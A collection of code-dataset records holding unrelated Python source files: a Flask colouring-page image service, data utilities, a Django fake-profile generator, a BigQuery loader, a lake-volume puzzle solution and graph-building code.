last_pos_measure = f_measurements.tell() # if we arrive at measurement of next station, go back one line\n line_measure = f_measurements.readline()\n \n while (line_measure != ''): \n\n cols = line_measure.strip().split()\n \n if (cols[0] != station_grp.grp):\n break\n \n \n\n\n \nroot_grp.close()\nf_receivers.close()\nf_cmt.close()\nf_event.close()\n\n\n\n\n\n\n","repo_name":"AlexSzen/private_Axisem3D","sub_path":"AxiSEM3D/python_tools/create_netcdf_input.py","file_name":"create_netcdf_input.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73388787049","text":"#!/usr/bin/env python3\n\nimport os\nimport time\nfrom base64 import b64encode\n\nimport cv2\nimport numpy as np\nimport opencensus.trace.tracer\nfrom flask import Flask, flash, redirect, render_template, request, send_from_directory\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom opencensus.ext.stackdriver import trace_exporter as stackdriver_exporter\n\nimport Frame\nimport HED\n\napp = Flask(__name__)\napp.secret_key = os.urandom(24)\n\n\ndef initialize_tracer(project_id):\n exporter = stackdriver_exporter.StackdriverExporter(\n project_id=project_id\n )\n tracer = opencensus.trace.tracer.Tracer(\n exporter=exporter,\n sampler=opencensus.trace.tracer.samplers.AlwaysOnSampler()\n )\n return tracer\n\n\nif os.getenv(\"GAE_ENV\", \"\").startswith(\"standard\"):\n \"\"\" Production in the standard environment \"\"\"\n from google.cloud import logging\n import googlecloudprofiler\n\n client = logging.Client()\n client.setup_logging()\n\n try:\n googlecloudprofiler.start(verbose=3)\n except (ValueError, NotImplementedError) as exc:\n app.logger.error(exc)\nelse:\n \"\"\" Local execution \"\"\"\n app.debug = True\n\n import flask_monitoringdashboard as dashboard\n\n dashboard.bind(app) # for Profiling\n toolbar = DebugToolbarExtension(app) # for Profiling\n app.config[\"DEBUG_TB_PROFILER_ENABLED\"] = True # for Profiling\n\napp.config[\"TRACER\"] = initialize_tracer(\"nuricame-web\") # for Profiling\n\napp.config[\"MAX_CONTENT_LENGTH\"] = 10 * 1024 * 1024 # 10MiB\nALLOWED_EXTENSIONS = {\"bmp\", \"dib\", \"jpg\", \"jpeg\", \"jpe\", \"jp2\", \"png\", \"webp\", \"pbm\", \"pgm\", \"ppm\", \"pxm\", \"pnm\",\n \"pfm\", \"sr\", \"ras\", \"tiff\", \"tif\", \"exr\", \"hdr\", \"pic\"}\n\n\ndef allowed_file(filename):\n return \".\" in filename and filename.rsplit(\".\", 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef redirect_with_flash(url, message, category):\n app.logger.debug(message)\n flash(message, category)\n return redirect(url)\n\n\n@app.route(\"/favicon.ico\")\ndef favicon():\n return send_from_directory(\"static\", \"favicon.ico\")\n\n\n@app.route(\"/manifest.json\")\ndef manifest():\n return send_from_directory(\"static\", \"manifest.json\")\n\n\n@app.route(\"/apple-touch-icon.png\")\ndef apple_touch_icon():\n return send_from_directory(\"static\", \"apple-touch-icon.png\")\n\n\n@app.route(\"/android-chrome-192x192.png\")\ndef android_chrome_192x192():\n return send_from_directory(\"static\", \"android-chrome-192x192.png\")\n\n\n@app.route(\"/android-chrome-512x512.png\")\ndef android_chrome_512x512():\n return send_from_directory(\"static\", \"android-chrome-512x512.png\")\n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef index():\n app.logger.debug(\"GET /index\")\n allowed_extensions = [\".\" + x for x in ALLOWED_EXTENSIONS]\n return render_template(\"index.html\", allowed_extensions=allowed_extensions)\n\n\n@app.route(\"/result\", methods=[\"GET\", \"POST\"])\ndef result():\n if request.method == \"GET\":\n app.logger.debug(\"GET /result\")\n return redirect(\"/\")\n app.logger.debug(\"POST /result\")\n start = time.time()\n\n if \"image\" not in request.files:\n app.logger.warning(\"Image parameter not POSTed!\")\n return redirect_with_flash(\"/\", \"Warning: イメージパラメータがありません!\", \"is-warning\")\n image = request.files.get(\"image\")\n app.logger.debug(f\"Uploaded: {image}\")\n if image.filename == \"\":\n app.logger.warning(\"No image has been selected!\")\n return redirect_with_flash(\"/\", \"Warning: 画像が選ばれていません。もう一度はじめからやりなおしてください。\", \"is-warning\")\n if not allowed_file(image.filename):\n app.logger.warning(\"Unauthorized extensions!\")\n return redirect_with_flash(\"/\", \"Warning: ぬりえにできない種類の画像です。違う画像でお試しください。\", \"is-warning\")\n\n try:\n img = image.read()\n img = np.frombuffer(img, dtype=np.uint8)\n img = cv2.imdecode(img, 1)\n except Exception as e:\n app.logger.error(f\"Exception: {e}\")\n return redirect_with_flash(\"/\", \"Warning: 画像の読み込みに失敗しました。 もう一度はじめからやりなおしてください。\", \"is-warning\")\n img = HED.convert(img)\n framed = Frame.compose(img)\n data = cv2.imencode(\".png\", framed)[1].tostring()\n nurie = b64encode(data).decode(\"utf-8\")\n app.logger.debug(f\"Elapsed Time: {time.time() - start}\")\n return render_template(\"result.html\", nurie=nurie)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8080, debug=True)\n","repo_name":"hacking-papa/nuricame-web","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71442273449","text":"import yaml\nimport os \nimport logging\nimport pandas as pd\nimport json\n\ndef read_yaml(path_to_yaml: str) -> dict:\n with open(path_to_yaml) as yaml_file:\n content = yaml.safe_load(yaml_file)\n return content\n\ndef create_directory(dirs: list):\n for dir_path in dirs:\n os.makedirs(dir_path, exist_ok=True)\n #print(f\"the directory is created at {dir_path}\")\n logging.info(f\"the directory is created at {dir_path}\")\n\ndef save_local_df(data, data_path, index=False):\n data.to_csv(data_path, index=index)\n print(f\"data frame save at {data_path}\")\n\ndef get_df(path_to_data: str, sep: str=\"\\t\") -> pd.DataFrame:\n df = pd.read_csv(\n path_to_data,\n encoding=\"utf-8\",\n header=None,\n delimiter=sep,\n names=[\"id\", \"label\", \"text\"],\n )\n logging.info(f\"The input data frame {path_to_data} size is {df.shape}\\n\")\n return df\n\n\ndef save_json(path, data):\n with open(path, \"w\") as f:\n json.dump(data, f, indent=4)\n\n logging.info(f\"json file saved at: {path}\")","repo_name":"Shyam-AI/dvc-nlp","sub_path":"src/utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28269778910","text":"from pandas import read_csv\nfrom datetime import datetime\n\n#读取数据,并对时间列进行格式转化\ndataset = read_csv('./raw.csv', parse_dates=[['year', 'month', 'day', 'hour']], index_col=0, date_parser=lambda x : datetime.strptime(x, \"%Y %m %d %H\"))\n#删除第一列\ndataset.drop('No', axis=1, inplace=True)\n#重命名列\ndataset.columns = ['pllution', 'dew', 'tem', 'pre', 'cbw', 'ws', 'is', 'ir']\n#索引改名为date\ndataset.index.name = 'date'\n#缺失数据用0填充\ndataset['pllution'].fillna(0, inplace=True)\n#移除前24条数据(1天数据)\ndataset = dataset[24:]\n#浏览前五条数据\nprint(dataset.head(5))\n\ndataset.to_csv('./pllution_test.csv')\n\n","repo_name":"ning8161/bi_action","sub_path":"资金流入、流出预测/lesson1_pm2.5预测/pm25_convert_test.py","file_name":"pm25_convert_test.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70031817129","text":"import sys\nfrom textgrid import TextGrid, IntervalTier\n\ndef adjust_intervals(textgrid_file, initial_trim_time, output_file):\n # Load the TextGrid file\n tg = TextGrid.fromFile(textgrid_file)\n\n # Adjust and round the overall xmin and xmax of the TextGrid\n tg.minTime = round(tg.minTime + initial_trim_time, 3)\n tg.maxTime = round(tg.maxTime + initial_trim_time, 3)\n\n # Iterate through each tier and adjust xmin, xmax and intervals\n for tier in tg.tiers:\n if isinstance(tier, IntervalTier):\n # Adjust and round xmin and xmax for each tier\n tier.minTime = round(tier.minTime + initial_trim_time, 3)\n tier.maxTime = round(tier.maxTime + initial_trim_time, 3)\n\n # Adjust and round the intervals\n for interval in tier:\n interval.minTime = round(interval.minTime + initial_trim_time, 3)\n interval.maxTime = round(interval.maxTime + initial_trim_time, 3)\n\n # Write the adjusted TextGrid back to a file\n tg.write(output_file)\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 4:\n print(\"Usage: python script.py \")\n sys.exit(1)\n\n textgrid_file = sys.argv[1]\n initial_trim_time = float(sys.argv[2]) # Convert string argument to float\n output_file = sys.argv[3]\n\n adjust_intervals(textgrid_file, initial_trim_time, output_file)\n","repo_name":"jan3zk/forced_alignment","sub_path":"compensate_trimming.py","file_name":"compensate_trimming.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7686859309","text":"# coding: utf-8\n\nimport datetime\nimport logging\n\nfrom faker import Factory\nfrom random import randint, sample, choice\n\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.core.management.base import BaseCommand\nfrom django.utils.text import slugify\n\nfrom apps.profile import models\nfrom apps.product.models import Category\n\n\nlogger = logging.getLogger('file')\nUser = get_user_model()\n\nNUM_USERS = 100\nNUM_MAIN_PROFILES = 100\nMAX_COMPANY_FOR_OWNER = 3\nMAX_CATEGORY_FOR_COMPANY = 4\nMAX_NEW_OWNERS = 3\nMAX_NEW_DELEGATES = 2\nMAX_NEW_INVITATIONS = 30\nMAX_NEW_OWNER_PHANTOMS = 2\nMAX_NEW_DELEGATE_PHANTOMS = 2\nMAX_NEW_LEVEL_1_PHANTOMS = 10\nMAX_NEW_LEVEL_2_PHANTOMS = 15\nMAX_NEW_FAVOURITES = 10\nMAX_NEW_PARTNERSHIPS = 30\nMAX_NEW_GUESTS = 10\npositions = ['Manager', 'Asst Manager', 'Asst General Manager', 'IT security', 'Senior Technician']\nLANGUAGE = ['it', 'en']\n\n\nclass FakeBase(object):\n model = None\n how_many = 0\n\n def __init__(self, opts=None):\n self.opts = opts\n self.fake = Factory.create('it-IT')\n\n def generate(self):\n for num in range(self.how_many):\n try:\n obj = self.model.objects.create(**self.get_map())\n logger.info('{}) {}: {}'.format(num, self.model, obj.id))\n except Exception as e:\n logger.error('{}) {}: {}'.format(num, self.model, e))\n\n def get_map(self):\n return {}\n\n\nclass FakeUser(FakeBase):\n model = User\n how_many = NUM_USERS\n\n def generate(self):\n for num in range(self.how_many):\n try:\n username = self.fake.profile()['username']\n obj = self.model.objects.create(\n username=username,\n first_name=self.fake.first_name(),\n last_name=self.fake.last_name(),\n email=self.fake.profile()['mail']\n )\n obj.set_password(username)\n obj.save()\n logger.info('{}) User: {}'.format(num, obj.id))\n except Exception as e:\n logger.error('{}) User: {}'.format(num, e))\n\n\nclass FakeMainProfile(FakeBase):\n \"\"\"\n Create Main Profiles\n \"\"\"\n model = models.MainProfile\n how_many = NUM_MAIN_PROFILES\n\n def generate(self):\n users = User.objects.all().order_by('?')[0:NUM_USERS]\n num = None\n for num, user in enumerate(users):\n try:\n data = {\n 'first_name': self.fake.first_name(),\n 'last_name': self.fake.last_name(),\n 'language': choice(LANGUAGE),\n 'phone': self.fake.phone_number(),\n 'fax': self.fake.phone_number(),\n 'mobile': self.fake.phone_number()\n }\n profile = user.create_main_profile(data)\n logger.info('{}) MainProfile: {}'.format(num, profile.id))\n except Exception as e:\n logger.error('{}) MainProfile: {}'.format(num, e))\n\n\nclass FakeCompany(FakeBase):\n model = models.Company\n how_many = MAX_COMPANY_FOR_OWNER\n\n def generate(self):\n mains = models.MainProfile.objects.all()\n categories = Category.objects.all()\n tot_categories = categories.count()\n description = '''Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut \n labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut \n aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore \n eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt \n mollit anim id est laborum.'''\n for profile in mains:\n # Any profile can create from 0 to MAX_COMPANY_FOR_OWNER companies\n for num in range(randint(0, self.how_many)):\n try:\n company_categories = {}\n for num_cat in range(randint(1, MAX_CATEGORY_FOR_COMPANY)):\n index = randint(0, tot_categories-1)\n company_categories[categories[index].code] = categories[index].name\n company, owner = profile.create_company({\n 'name': self.fake.company(),\n 'slug': slugify(self.fake.company()),\n 'description': description,\n 'ssn': self.fake.ssn(),\n 'url': self.fake.url(),\n 'email': self.fake.company_email(),\n 'phone': self.fake.phone_number(),\n 'fax': self.fake.phone_number(),\n 'category': company_categories\n })\n logger.info('{}) Company: {} {}'.format(num, company.id, owner.id))\n except Exception as e:\n logger.error('{}) Company: {}'.format(num, e))\n continue\n\n\nclass FakeOwner(object):\n \"\"\"\n Create Owner Profiles w/o send invitation\n \"\"\"\n how_many = MAX_NEW_OWNERS\n\n def generate(self):\n mains = models.MainProfile.objects.all()\n owners = models.OwnerProfile.objects.all()\n num_pr = mains.count()\n\n for first_owner in owners:\n for num in range(randint(1, self.how_many)):\n try:\n profile = mains[randint(0, num_pr - 1)]\n new_owner = profile.clone()\n new_owner.position = choice(positions)\n new_owner.role = settings.OWNER\n new_owner.company = first_owner.company\n new_owner.company_invitation_date = datetime.datetime.now()\n new_owner.profile_invitation_date = datetime.datetime.now()\n new_owner.invitation_refuse_date = None\n new_owner.save()\n logger.info('{}) Owner: {}'.format(num, new_owner.id))\n except Exception as e:\n logger.error('{}) Owner: {}'.format(num, e))\n\n\nclass FakeDelegate(object):\n \"\"\"\n Create Delegate Profiles with accepted invitation\n \"\"\"\n how_many = MAX_NEW_DELEGATES\n\n def generate(self):\n mains = models.MainProfile.objects.all()\n owners = models.OwnerProfile.objects.all()\n num_pr = mains.count()\n\n for first_owner in owners:\n for num in range(randint(1, self.how_many)):\n try:\n profile = mains[randint(0, num_pr - 1)]\n new_delegate = profile.clone()\n new_delegate.position = choice(positions)\n new_delegate.role = settings.DELEGATE\n new_delegate.company = first_owner.company\n new_delegate.company_invitation_date = datetime.datetime.now()\n new_delegate.profile_invitation_date = datetime.datetime.now()\n new_delegate.invitation_refuse_date = None\n new_delegate.save()\n logger.info('{}) Delegate: {}'.format(num, new_delegate.id))\n except Exception as e:\n logger.error('{}) Delegate: {}'.format(num, e))\n\n\nclass FakeLevel1(object):\n \"\"\"\n Create Level 1 Profiles with accepted invitation\n \"\"\"\n how_many = MAX_NEW_INVITATIONS\n\n def generate(self):\n mains = models.MainProfile.objects.all()\n owners = models.OwnerProfile.objects.all()\n num_pr = mains.count()\n\n for first_owner in owners:\n for num in range(randint(1, self.how_many)):\n try:\n profile = mains[randint(0, num_pr - 1)]\n new_level_1 = profile.clone()\n new_level_1.position = choice(positions)\n new_level_1.role = settings.LEVEL_1\n new_level_1.company = first_owner.company\n new_level_1.company_invitation_date = datetime.datetime.now()\n new_level_1.profile_invitation_date = datetime.datetime.now()\n new_level_1.invitation_refuse_date = None\n new_level_1.save()\n logger.info('{}) Level 1: {}'.format(num, new_level_1.id))\n except Exception as e:\n logger.error('{}) Level 1: {}'.format(num, e))\n\n\nclass FakeLevel2(object):\n \"\"\"\n Create Level 2 Profiles with accepted invitation\n \"\"\"\n how_many = MAX_NEW_INVITATIONS\n\n def generate(self):\n mains = models.MainProfile.objects.all()\n owners = models.OwnerProfile.objects.all()\n num_pr = mains.count()\n\n for first_owner in owners:\n for num in range(randint(1, self.how_many)):\n try:\n profile = mains[randint(0, num_pr - 1)]\n new_level_2 = profile.clone()\n new_level_2.position = choice(positions)\n new_level_2.role = settings.LEVEL_2\n new_level_2.company = first_owner.company\n new_level_2.company_invitation_date = datetime.datetime.now()\n new_level_2.profile_invitation_date = datetime.datetime.now()\n new_level_2.invitation_refuse_date = None\n new_level_2.save()\n logger.info('{}) Level 2: {}'.format(num, new_level_2.id))\n except Exception as e:\n logger.error('{}) Level 2: {}'.format(num, e))\n\n\nclass FakePhantom(FakeBase):\n def generate(self):\n mains = models.MainProfile.objects.all()\n owners = models.OwnerProfile.objects.all()\n num_pr = mains.count()\n\n how_many_dict = {\n settings.OWNER: MAX_NEW_OWNER_PHANTOMS,\n settings.DELEGATE: MAX_NEW_DELEGATE_PHANTOMS,\n settings.LEVEL_1: MAX_NEW_LEVEL_1_PHANTOMS,\n settings.LEVEL_2: MAX_NEW_LEVEL_2_PHANTOMS\n }\n for first_owner in owners:\n for role, numbers in how_many_dict.items():\n for num in range(randint(1, numbers)):\n try:\n profile = mains[randint(0, num_pr - 1)]\n phantom = profile.clone()\n phantom.position = choice(positions)\n phantom.user = None\n phantom.role = role\n phantom.company = first_owner.company\n phantom.company_invitation_date = datetime.datetime.now()\n phantom.profile_invitation_date = datetime.datetime.now()\n phantom.invitation_refuse_date = None\n phantom.save()\n logger.info('{}) Phantom: {}'.format(num, phantom.id))\n except Exception as e:\n logger.error('{}) Phantom: {}'.format(num, e))\n\n\nclass FakeGuest(FakeBase):\n how_many = MAX_NEW_GUESTS\n\n def generate(self):\n mains = models.MainProfile.objects.all()\n owners = models.OwnerProfile.objects.authenticated()\n num_pr = mains.count()\n roles = settings.PROFILE_PROFILE_ROLE_CHOICES\n\n for first_owner in owners:\n for num in range(randint(1, self.how_many)):\n try:\n profile = mains[randint(0, num_pr - 1)]\n guest = profile.clone()\n guest.position = choice(positions)\n guest.role = sample(roles, 1)[0][0]\n guest.company = first_owner.company\n guest.company_invitation_date = datetime.datetime.now()\n guest.profile_invitation_date = None\n guest.invitation_refuse_date = None\n guest.save()\n logger.info('{}) Guest: {}'.format(num, guest.id))\n except Exception as e:\n logger.error('{}) Guest: {}'.format(num, e))\n\n\nclass FakeFavourite(FakeBase):\n how_many = MAX_NEW_FAVOURITES\n\n def generate(self):\n mains = models.MainProfile.objects.all()\n companies = models.Company.objects.all()\n num_companies = companies.count()\n\n for main in mains:\n for num in range(randint(0, self.how_many)):\n try:\n company = companies[randint(0, num_companies)]\n favourite = main.follow_company(company)\n logger.info('{}) Favourite: {}'.format(num, favourite.id))\n except Exception as e:\n logger.error('{}) Favourite: {}'.format(num, e))\n\n\nclass FakePartnership(FakeBase):\n how_many = MAX_NEW_PARTNERSHIPS\n\n def generate(self):\n owners = models.OwnerProfile.objects.authenticated()\n companies = models.Company.objects.all()\n num_companies = companies.count()\n\n for owner in owners:\n for num in range(randint(0, self.how_many)):\n try:\n company = companies[randint(0, num_companies)]\n partnership = owner.create_partnership(company)\n logger.info('{}) Partnership: {}'.format(num, partnership.id))\n except Exception as e:\n logger.error('{}) Partnership: {}'.format(num, e))\n\n\nclass Command(BaseCommand):\n \"\"\"\n Set Products and so on\n \"\"\"\n\n def add_arguments(self, parser):\n # -c enables logging using store_true\n parser.add_argument(\n '-c', '--console', action='store_true', default=False,\n help='Debug - write logging to console'\n )\n # -q changes opt --verbose setting to const\n parser.add_argument(\n \"-q\", \"--quiet\",\n action=\"store_const\", const=0, dest=\"verbose\"\n )\n # log level\n parser.add_argument(\n '-l', '--debug-level', default='error',\n help='Set debug level (debug, info, warnings) for console',\n )\n # pass data\n parser.add_argument(\n '-d', '--data', default='all',\n help=(\n 'Pass data (all - All classes, usr - User'\n ', mnpf - Main Profile, cmpy - Company'\n ', o - Owner, del - Delegate'\n ', lvl1 - Level1, lvl2 - Level2'\n ', phantom - Phantom, guest - Guest'\n ', fav - Favourite, ptp - Partnership)'\n )\n )\n\n def handle(self, *args, **options):\n\n level = getattr(logging, options.get('debug_level').upper())\n logger.setLevel(level)\n if options.get('console'):\n console_handler = logging._handlers['console']\n console_handler.setLevel(level)\n logger.handlers = []\n logger.addHandler(console_handler)\n\n # usr/all (Executes User)\n if options.get('data') in ['usr', 'all']:\n fake_user = FakeUser()\n fake_user.generate()\n # mnpf/all (Executes Main Profile)\n if options.get('data') in ['mnpf', 'all']:\n fake_main_profile = FakeMainProfile()\n fake_main_profile.generate()\n # cmpy/all (Executes Company)\n if options.get('data') in ['cmpy', 'all']:\n fake_company = FakeCompany()\n fake_company.generate()\n # o/all (Executes Owner - Creates a new company profile)\n if options.get('data') in ['o', 'all']:\n fake_owner = FakeOwner()\n fake_owner.generate()\n # del/all (Executes Delegate - Creates a new company profile)\n if options.get('data') in ['del', 'all']:\n fake_delegate = FakeDelegate()\n fake_delegate.generate()\n # lvl1/all (Executes Level1 - Creates a new company profile)\n if options.get('data') in ['lvl1', 'all']:\n fake_level1 = FakeLevel1()\n fake_level1.generate()\n # lvl2/all (Executes Level2 - Creates a new company profile)\n if options.get('data') in ['lvl2', 'all']:\n fake_level2 = FakeLevel2()\n fake_level2.generate()\n # phantom/all (Executes Phantom - Creates a new company profile)\n if options.get('data') in ['phantom', 'all']:\n fake_phantom = FakePhantom()\n fake_phantom.generate()\n # guest/all (Executes Guest)\n # if options.get('data') in ['guest', 'all']:\n # fake_guest = FakeGuest()\n # fake_guest.generate()\n # fav/all (Executes Favourite)\n if options.get('data') in ['fav', 'all']:\n fake_favourite = FakeFavourite()\n fake_favourite.generate()\n # ptp/all (Executes Partnership)\n if options.get('data') in ['ptp', 'all']:\n fake_partnership = FakePartnership()\n fake_partnership.generate()\n","repo_name":"monkeybits/edilcloud-back","sub_path":"web/management/commands/1_fake_profile_generator.py","file_name":"1_fake_profile_generator.py","file_ext":"py","file_size_in_byte":16919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35191194643","text":"import csv\nimport json\nimport requests\nfrom flask import Flask, render_template\nimport google.cloud\nfrom google.cloud import pubsub\nfrom google.cloud import bigquery\n\n\ndef retriveapi(requestURL, dataSet, tableName):\n # CREATE API REQUEST\n queryClient = bigquery.Client()\n request = requests.get(url=requestURL, params='')\n response = request.json()\n data = json.dumps(response)\n result = json.loads(data)\n # SOME TRANSFORMATION\n '''\n for x in result:\n if (x['id'] == 2):\n x['name'] = 'Olles Bryggeri'\n '''\n header = []\n for item in result[0].keys():\n header.append(item)\n\n for line in result:\n for item in line:\n if (type(line[item]) is not str):\n if (type(line[item]) is not int):\n line[item] = str(line[item])\n\n bigQuerySchema = []\n for item in result[0]:\n listOfItems = result[0]\n x = type(listOfItems[item])\n if (x is str):\n bigQuerySchema.append(bigquery.SchemaField(item, 'STRING'))\n if (x is int):\n bigQuerySchema.append(bigquery.SchemaField(item, 'INTEGER'))\n datasetRef = queryClient.dataset(dataSet)\n try:\n dataset = bigquery.Dataset(datasetRef)\n dataset.location = 'US'\n dataset = queryClient.create_dataset(dataset)\n print('Dataset created')\n except:\n print('Dataset Already exsists')\n tableRef = datasetRef.table(tableName)\n table = bigquery.Table(tableRef, schema=bigQuerySchema)\n try:\n table = queryClient.create_table(table)\n assert table.table_id == tableName\n print('Creating Table')\n except:\n print('Table already exists')\n finally:\n # INSERT INTO TABLE\n jobConfig = bigquery.LoadJobConfig()\n jobConfig.schema = bigQuerySchema\n jobConfig.source_format = bigquery.SourceFormat.NEWLINE_DELIMITED_JSON\n\n for jsonObj in result:\n sourceFile = open('tmp.json', 'w+')\n jsonItem = json.dumps(jsonObj)\n sourceFile.write(str(jsonItem))\n sourceFile.close()\n sourceFile = open('tmp.json', 'rb')\n load_job = queryClient.load_table_from_file(\n sourceFile,\n tableRef,\n location='US',\n job_config=jobConfig)\n print('Starting job {}'.format(load_job.job_id))\n load_job.result()\n print('Row Finished.')\n destination_table = queryClient.get_table(datasetRef.table(tableName))\n print('Added: ' + str(jsonObj))\n print('Loaded {} rows.'.format(destination_table.num_rows))\n\n print('Job finished.')\n destination_table = queryClient.get_table(datasetRef.table(tableName))\n print('Loaded {} rows.'.format(destination_table.num_rows))\n rowNumber = destination_table.num_rows\n return 'Loaded '+str(rowNumber)+' rows to database'\n\n\n","repo_name":"olleberg94/testApp","sub_path":"backend/uploadAPI.py","file_name":"uploadAPI.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43094175191","text":"'''Find the Volume of Each Lake Created by Rainwater\nhttps://techdevguide.withgoogle.com/resources/volume-of-water/#code-challenge\n'''\n\n# Data visualizaton\n#import matplotlib.pyplot as plt\n#from matplotlib import rc\n#import seaborn as sns\n# Data modeling\nfrom dataclasses import dataclass, field, asdict\nimport json\n# Type hinting\nfrom typing import List, Dict\n\n@dataclass\nclass Model:\n '''Determine the amount of rainwater that can be collected \n between various mountain range heights\n '''\n heights: List[int]\n data: Dict = field(default_factory=lambda: {})\n volume: List = field(default_factory=lambda: [])\n \n def __post_init__(self):\n '''Execute after initializing the class\n '''\n \n # Set store keys\n self.data = {}\n for i in range(len(self.heights)):\n self.data[i] = []\n \n # Indices to ignore in inner loop\n ignore_index = []\n \n for i in range(len(self.heights)):\n index_visited = []\n height_visited = []\n volume = []\n max_height = 0\n \n for j in range(i, len(self.heights)):\n # Skip ignored indices\n if j not in ignore_index and i != j:\n index_visited.append(j)\n height_visited.append(self.heights[j])\n # Set max range height/index. Exclude the first index in range\n if self.heights[j] > max_height and j != i:\n max_height = self.heights[j]\n \n # Store possible volume\n volume.append(self.heights[i] - self.heights[j])\n \n ignore_index.append(j)\n \n # Exit inner loop\n if self.heights[j] > self.heights[i]:\n break\n \n # Set the max heights\n if height_visited != []:\n max_height = max(height_visited)\n \n if max_height > self.heights[i]:\n max_height = self.heights[i]\n \n data = {\n 'index': i,\n 'indices_visited': index_visited,\n 'height': self.heights[i],\n 'heights_visited': height_visited,\n 'volume': volume,\n 'max_height': max_height\n }\n \n for k in reversed(range(len(data['volume']))):\n if data['volume'][k] <= 0:\n for key in data:\n if type(data[key]) is list:\n data[key] = data[key][:k]\n \n # Reset the max heights\n if data['max_height'] < data['height']:\n if len(data['heights_visited']) > 0:\n data['max_height'] = max(data['heights_visited'])\n \n # Slice lists in the data object at max range height\n for k in reversed(range(len(data['heights_visited']))):\n if data['heights_visited'][k] == data['max_height']:\n for key in data:\n # Check if key/value is a list\n if type(data[key]) is list:\n data[key] = data[key][:k]\n \n # Reset volume\n if len(data['volume']):\n for k in range(len(data['volume'])):\n data['volume'][k] = data['max_height'] - data['heights_visited'][k]\n self.volume.append(data['volume'][k])\n \n self.data[i].append(data)\n\n\nif __name__ == '__main__':\n HEIGHTS = [1, 3, 2, 4, 1, 3, 1, 4, 5, 2, 2, 1, 4, 2, 2]\n M = Model(HEIGHTS)\n print(json.dumps(asdict(M), indent=2))\n","repo_name":"fjemi/coding_challenges","sub_path":"challenges/lake_volume_01.py","file_name":"lake_volume_01.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36617725805","text":"import numpy as np\nimport time\nfrom graph_tool.all import Graph, shortest_path, load_graph\n\nfrom power_planner.utils.utils import angle, get_lg_donut\nfrom power_planner.utils.utils_constraints import ConstraintUtils\nfrom power_planner.utils.utils_costs import CostUtils\n\nfrom .general_graph import GeneralGraph\n\n\nclass LineGraphFromGraph():\n \"\"\"\n Class to build a line graph from a given weighted graph\n \"\"\"\n\n def __init__(\n self,\n prev_graph,\n cost_instance,\n hard_constraints,\n directed=True,\n graphtool=1,\n verbose=1\n ):\n tic = time.time()\n assert cost_instance.shape == hard_constraints.shape\n self.cost_instance = cost_instance\n self.hard_constraints = hard_constraints\n\n # Load graph\n GeneralGraph.load_graph(self, prev_graph)\n # self.weight_prev = prev_graph.ep.weight\n self.n_edges = len(list(self.g_prev.edges()))\n\n # node to pos mapping\n x_len, y_len = cost_instance.shape\n self.node_pos = [\n (i, j) for i in range(x_len) for j in range(y_len)\n if hard_constraints[i, j]\n ]\n # pos to node mapping\n self.pos2node = np.ones(cost_instance.shape)\n self.pos2node *= -1\n for n, (i, j) in enumerate(self.node_pos):\n self.pos2node[i, j] = n\n print(\"initialized weighted graph (pos2node and node_pos)\")\n\n # edge to node mapping\n max_shape = (\n int(np.max(self.pos2node)) + 1, int(np.max(self.pos2node)) + 1\n )\n self.edge_to_node = np.ones(max_shape)\n self.edge_to_node *= -1\n for k, edge in enumerate(self.g_prev.edges()):\n (i, j) = tuple(edge)\n self.edge_to_node[int(i), int(j)] = k\n\n # initilize graph\n GeneralGraph.__init__(\n self, directed=directed, graphtool=graphtool, verbose=verbose\n )\n self.verbose = verbose\n\n self.time_logs = {}\n self.time_logs[\"init_graph\"] = round(time.time() - tic, 3)\n\n def add_nodes(self):\n tic_function = time.time()\n GeneralGraph.add_nodes(self, self.n_edges)\n self.time_logs[\"add_nodes\"] = round(time.time() - tic_function, 3)\n\n def add_edges(self, max_angle=0.5 * np.pi):\n tic_edges = time.time()\n edges = []\n for i, v in enumerate(self.g_prev.vertices()):\n for in_nb in v.in_neighbours():\n for out_nb in v.out_neighbours():\n in_nb_ind = self.node_pos[int(in_nb)]\n out_nb_ind = self.node_pos[int(out_nb)]\n pos = self.node_pos[i]\n # vector between: subtract two pos tuples\n vec1 = np.subtract(in_nb_ind, pos)\n vec2 = np.subtract(pos, out_nb_ind)\n angle_cost = angle(vec1, vec2) / (max_angle)\n if angle_cost <= 1:\n v1_line = self.edge_to_node[int(in_nb), i]\n v2_line = self.edge_to_node[i, int(out_nb)]\n cost_before = self.cost_instance[pos[0], pos[1]]\n edges.append(\n [v1_line, v2_line, 0.5 * angle_cost + cost_before]\n )\n toc_edges = time.time()\n\n tic = time.time()\n self.graph.add_edge_list(edges, eprops=[self.weight])\n\n # time logs\n self.time_logs[\"add_edges\"] = round(time.time() - tic, 3)\n self.time_logs[\"add_edges_times\"] = 0\n self.time_logs[\"edge_list\"] = round(toc_edges - tic_edges, 3)\n self.time_logs[\"edge_list_times\"] = 